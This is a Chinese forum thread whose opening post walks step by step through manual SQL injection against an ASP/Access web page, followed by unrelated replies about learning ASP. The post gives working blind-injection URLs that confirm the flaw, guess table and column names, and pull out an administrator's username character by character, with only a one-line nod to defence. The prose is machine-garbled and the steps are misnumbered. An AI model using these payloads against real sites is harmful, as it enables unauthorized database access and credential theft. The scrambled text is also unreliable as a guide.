变相怪杰 发表于 2015-1-16 22:17:59

ASP网页设计从手工注进看进攻之Access

asp可以使用微软的activeX使得网页功能无比强大,不过安全性也较差,而且是基于的windows服务器,所以性能稳定性也一般access  良多情形下,进侵者在利用工具注进时发明工具才解不出来表名和字段名,那是由于一切的工具都有本人的一部字典,这部字典内包含了表名和字段名,假如办理员把表名和字段名改成了不在这部字典内,那末我们利用的工具将没法猜解出字段名和表名。在以下的文章中,将从剖析手工注进动身,来打造抵抗SQL注进的防地。
  进侵者将会机关复杂的判别前提,来判别该页面是不是存在注进毛病,一样平常步骤以下:
  这里要检测的页面为http://127.0.0.1/111/view.asp?id=198
  1.进侵者要想对站点举行手工注进就必需对扫瞄器举行设置,以包管手工注进时能前往堕落信息,其操纵步骤以下:
  右键点击扫瞄器选择“属性”,在弹出来的对话框当选择“初级”选项卡。以下图所示:



图一
  接着往失落“显现友爱的HTTP毛病信息”后面的钩,最初点击“使用”按钮便可。
  2.进侵者向扫瞄器提交以下url:
  http://127.0.0.1/111/view.asp?id=198and1=1
  假如存在SQL注进毛病,就能够查询数据库,1=1是一个恒等式能够疏忽,因而会前往一个一般的页面,此页面和http://127.0.0.1/111/view.asp?id=198一样,这时候进侵者便判别此站有但愿被注进。假如前往的是一些毛病信息,那末一些低级的进侵者大概就会保持这个站点。
  3.进侵者进一步向扫瞄器提交以下url:

  http://127.0.0.1/111/view.asp?id=198and1=2
  1=2为一个恒不等式,假如该站点撑持数据库查询,则也许会前往以下图所示的信息:



图二
  一样平常呈现上图所示进侵者就基础断定此站可以举行SQL注进打击了。
  不外良多时分进侵者只需用一个单引号便可疾速判别出方针站点是不是存在SQL注进毛病,向扫瞄器提交以下url:
  http://127.0.0.1/111/view.asp?id=198’假如前往以下信息则申明有一半时机以上存在注进毛病:
  MicrosoftOLEDBProviderforODBCDrivers毛病’80040e14’
  字符串的语法毛病在查询表达式’id=1’’中。/list.asp,行50
  4.此时进侵者入手下手机关特别的SQL查询语句入手下手查询站点数据库的表名,向url提交以下语句:
  http://127.0.0.1/111/view.asp?id=198andexists(select*fromadmin)
  这个语句是向数据库查询是不是存在admin这个表,假如存在则前往一般页面,假如不存在此表则前往堕落页面。一样平常进侵者会先测试经常使用的表名,也是一样平常的注进工具暗码字典内存在的表名和字段名。假如表名不在经常使用表名中则进侵者就会分离社会工程学来猜解表名,这类情形下进侵者料中表名的概率较低。
  5.进侵者在失掉表名后入手下手机关查询语句查询数据库字段名,向url提交以下语句:
  http://127.0.0.1/111/view.asp?id=198andexists(selectuserfromadmin)
  这个语句是向数据库中admin表中查询是不是存在user字段,假如存在则前往一般页面,假如不存在则前往堕落页面。
  7.接上去进侵者入手下手断定字段id的值,机关以下语句能够查询id的值:http://127.0.0.1/111/view.asp?id=198andexists(selectidfromadminwhereid=1)
  准确则前往准确页面,毛病则前往堕落页面。
  6.表名和字段名推测出来今后,进侵者入手下手机关查询语句推测办理员帐号长度,向url提交以下语句:
  http://127.0.0.1/111/view.asp?id=198andexists(selectidfromadminwherelen(user)<6andid=1)
  此语句为查询user字段顶用户名长度局限,暗示长度小于6,准确则前往一般页面,毛病则前往堕落页面。
  减少局限,然后机关以下语句断定用户名详细长度:
  http://127.0.0.1/111/view.asp?id=198andexists(selectidfromadminwherelen(user)=5andid=1)
  准确则前往一般页面,毛病则前往堕落页面。
  8.接上去进侵者入手下手进进最初的环节机关语句查询办理员用户名,向url提交以下语句:http://127.0.0.1/111/view.asp?id=198andexists(selectcount(*)fromadminwhereleft(user,1)=a)
  此语句是从用户名右边入手下手推测用户名地一名为a,准确则前往一般页面,毛病则前往堕落页面,一名一名猜,猜第2位时,修正语句为(user,2)=ad,前面类推。
  在进侵者失掉用户名暗码今后,此次注进就靠近序幕了。
  至于提防办法很复杂,从下面的历程能够看出假如表名和字段名不在经常使用表名和字段名中则进侵者是利用社会工程学来猜解,假如办理员修正的表名和字段名充足庞大则进侵者仍然不克不及到达目标,另有一种复杂的进攻办法就是到网上往下载一些防注进补钉程序打上就能够了,这类办法是修正站点文件,增添过滤语句来过滤进侵者提交的语句来到达防注进的,这里就不再给人人解说其道理了。
Windows本身的所有问题都会一成不变的也累加到了它的身上。安全性、稳定性、跨平台性都会因为与NT的捆绑而显现出来;

乐观 发表于 2015-1-19 07:00:54

下载一个源代码,然后再下载一个VBScript帮助,在源代码中遇到不认识的函数或是其他什么程序,都可以查帮助进行解决,这样学习效率很高。

活着的死人 发表于 2015-1-26 23:21:31

从事这个行业,那么你可以学ASP语言,简单快速上手,熟练dreamweav排版,写asp代码,熟练photoshop处理图片,打好基础就行了

透明 发表于 2015-2-5 00:39:52

代码逻辑混乱,难于管理:由于ASP是脚本语言混合html编程,所以你很难看清代码的逻辑关系,并且随着程序的复杂性增加,使得代码的管理十分困难,甚至超出一个程序员所能达到的管理能力,从而造成出错或这样那样的问题。

若天明 发表于 2015-2-11 00:22:59

封装性使得代码逻辑清晰,易于管理,并且应用到ASP.Net上就可以使业务逻辑和Html页面分离,这样无论页面原型如何改变,业务逻辑代码都不必做任何改动;继承性和多态性使得代码的可重用性大大提高。

深爱那片海 发表于 2015-3-1 19:07:43

接下来就不能纸上谈兵了,最好的方法其实是实践。实践,只能算是让你掌握语言特性用的。而提倡做实际的Project也不是太好,因为你还没有熟练的能力去综合各种技术,这样只能使你自己越来越迷糊。

柔情似水 发表于 2015-3-10 22:15:10

我认为比较好的方法是找一些比较经典的例子,每个例子比较集中一种编程思想而设计的。

分手快乐 发表于 2015-3-17 11:32:44

那么,ASP.Net有哪些改进呢?

变相怪杰 发表于 2015-3-24 09:38:55

在平时的学习过程中要注意现学现用,注重运用,在掌握了一定的基础知识后,我们可以尝试做一些网页,也许在开始的时候我们可能会遇到很多问题,比如说如何很好的构建基本框架。
页: [1]
查看完整版本: ASP网页设计从手工注进看进攻之Access